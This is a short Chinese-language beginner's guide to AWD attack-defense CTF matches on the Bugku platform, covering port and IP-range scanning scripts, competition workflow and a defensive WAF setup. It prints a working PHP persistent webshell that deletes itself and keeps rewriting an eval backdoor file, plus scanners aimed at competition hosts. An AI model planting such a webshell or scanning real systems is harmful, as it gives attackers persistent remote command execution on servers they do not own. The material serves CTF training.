AWD从入门到入土

  1. 端口查询
  2. IP段查询
  3. 不死马示例
  4. AWD 攻防全流程

rm -rf xxxx 删除命令 //当发现服务器被上马了可以快速删掉

Remote host填虚拟IP

New一个用户名和密码,填bugku上给的就行,用户名一般是teamx,然后端口给啥就要填啥,bugku的awd端口是2222

端口查询

import requests
url = "https://192-168-1-183.pvp5377.bugku.cn:"
for i in range(0,65536):
    url_new = url + '{}'.format(i)
    try:
        if(requests.get(url_new).status_code == 200):
            print(url_new + '能访问到')
    except:
        pass

IP段查询

import requests
url = "https://192-168-1-"
url2 = ".pvp5377.bugku.cn"
for i in range(1,256):
    url_new = url + '{}'.format(i) + url2
    try:
        if(requests.get(url_new).status_code == 200):
            print(url_new + '能访问到')
    except:
        pass

不死马示例

谨慎使用,不要在真实环境使用 ,容易吃大锅饭

<?php
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
while(1){
    $content = '<?php @eval($_POST["cmd"]);?>';
    file_put_contents("shell.php",$content);
    usleep(10000);
}
?>

1、ignore_user_abort()函数:函数设置与客户机断开是否会终止脚本的执行,如果设置为true,则忽略与用户的断开。

2、set_time_limit()函数:设置允许脚本运行的时间,单位为秒。如果设置为0(零),没有时间方面的限制。

3、unlink(__FILE__)函数;删除文件。

4、file_put_contents函数;将一个字符串写入文件。

5、usleep函数:延迟执行当前脚本若干微妙(一微妙等于一百万分之一秒)

AWD 攻防全流程

1、ssh连接

2、备份html文件夹,D盾扫描,发现其中的后门或者漏洞

3、上看鸟通防

php watchbird.php –install [Web目录]
例如:php watchbird.php –install /var/www/html

在网页运行/?watchbird=ui 进行管理系统界面,第一次需要设置密码

4、扫描IP网段,查询存在的IP(脚本扫描)

5、通过自己D盾扫描的漏洞,尝试进行漏洞利用,获取flag